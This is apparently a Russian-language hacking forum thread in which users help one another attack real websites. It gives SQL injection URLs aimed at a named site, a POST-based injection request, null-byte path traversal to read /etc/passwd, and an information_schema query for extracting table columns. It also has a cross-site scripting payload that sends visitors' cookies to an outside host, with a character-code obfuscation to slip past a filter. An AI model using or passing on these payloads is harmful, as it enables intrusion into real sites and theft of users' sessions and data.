все правильно при таком запросе у тя будет void;pass -> login: void pass: pass 0x3b -> разделитель ; больше записей в users нету поэтому пустой рез. Версия бд 4.1.18 Ну нет доступа это обычное дело, правильно права выставлены.
http://www.prstyle.ru/index.php?id=47+union+select+1,2,3,4/* По какой причине вылазит: ? Использование select имеет неправильный номер в колонке, как-то так..
Мне живые примеры нуны для того, шоп убедиццо, шо я прально всё делаю. А запросы простенькие я могу составлять,и интрудер у меня есть ((((,
Ershik, там 3 колонки http://www.prstyle.ru/index.php?id=47+order+by+4/* http://www.prstyle.ru/index.php?id=47+order+by+3/*
Всем прива ! У меня следующая проблема, проворачиваю активную ксс, код получился таким - <body onload=img = new Image(); img.src = "http://s.netsec.ru/xxx.gif?"+document.cookie;> Но символ / фильтруется, вернее даже не фильтруется, а все, что идет после него, обрубается, включая символ, можно ли что нибудь при таком раскладе сделать ?
Можно строку "http://s.netsec.ru/xxx.gif?" зашифровать в ASCII-коды, а потом яваскриптом расшифровывать с помощью String.fromCharCode(); Например: Code: String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63); //это вернёт строку http://s.netsec.ru/xxx.gif? А финальный вариант без ошибок примерно такой: Code: <body onload="javascript:img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47, 47,115,46,110,101,116, 115,101,99,46,114,117,47, 120,120,120,46,103,105,102,63);+document.cookie;">
"><script>alert()</script> Вопрос: Почему при передаче символов с двойными и одинарными кавычками не срабатывает ? А с передачей чисел пашет
"><script>alert(/blablabla/)</script> кавычки не срабатывают изза magic_quotes или чегониб типа addslashes()
2 ZET36 там нет sql иньекции, там только раскрытие пути. 2 Велемир попробуй Code: "><script>alert(/text/)</script>
Нашёл инъекцию через POST : POST /oplok.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.site.com Content-Length: 66 Cookie: PHPSESSID=a0e17714683f525e29aa6268ed85bf8b;hotlog= 1 Connection: Close Pragma: no-cache id=%2D%31%2B%6F%72%64%65%72%2B%62%79%2B%35%30%30%3 0%30%30%30%2F%2A Передал запрос : -1+order+by+5000( тот,что выше).При передаче вместо 5000 еденицы или нуля выдаёт ту же ошибку - <b>Warning</b>: mysql_free_result(): supplied argument is not a valid MySQL result resource in <b>/home/wmkhark/public_html/oplok.php</b> on line <b>500</b><br /> Не может же такого быть О_О )( Я знаю, про это где-то писали, лень мучить форум поиском:Р. Достал я вот файл etc/passwd.Пароль там не хранится,но есь какийто пути.Так же есь фаил etc/group. Не пойму,почему не работает etc/passwd%00.txt,но работает etc/passwd%00.jpg ? Они же не в этом формате Ж).Имея только эти файлы сделать что-то можно ?).Или какие-то другие пути нужны? Server banner Apache/2.2.3 (CentOS) Operating system Unix Web server Apache 2.x Из чувствительных директорий только /forum,/forum/css и т.д,но к ним нет доступа. папок типа админ и администратор нету.Йа ф шоке. Некуда даже инфу вводить)). Ну тык, умеет кто проводить sql inj через POST запросы ? Лично я в нете шарил - не нашёл ни одного гайда по этой теме.
мде.. Посмотреть колумны в таблицеесли версия mysql 5,с помощью запроса: http://site.ru/index.php?id=1+union+select+1,2,3,column_name,5,6,....+from+information.schema.columns+where+table_name='user_privileges' Потом обычным запросом ужевыдирать данные! Но табла "user_privileges" ничем не интересна имхо!